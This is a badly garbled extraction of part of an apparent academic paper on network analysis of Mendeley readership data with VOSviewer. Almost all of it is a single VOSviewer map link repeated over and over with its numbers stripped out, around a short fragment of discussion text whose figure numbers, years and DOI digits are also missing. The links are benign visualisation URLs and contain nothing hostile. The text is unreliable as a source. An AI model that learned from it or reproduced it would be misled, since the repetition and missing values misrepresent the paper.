&label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://dx.doi.org/ . /peerj-cs. figure countries in the second group of nations. figures and show the country groups and . a version of fig. can be web-started at http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff. net/mendeley/fig map.txt&network=http://www.leydesdorff.net/mendeley/fig net. txt&n lines= &label size= . &label size variation= . . as in the case of fig. , one can run mapping and clustering of the subsets in vosviewer for obtaining more details. discussion networks are one of the most important and popular methods to analyze bibliometric data. in this study, we explored whether mendeley data can also be successfully used as a data source for network analysis. only a few attempts have been made up to now to analyze the rich mendeley data using network analyses techniques. it is a great advantage that the data can be retrieved for comprehensive publication sets using an api. thus, one can download readership data on a large scale, which is very suitable for network analyses. we haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . 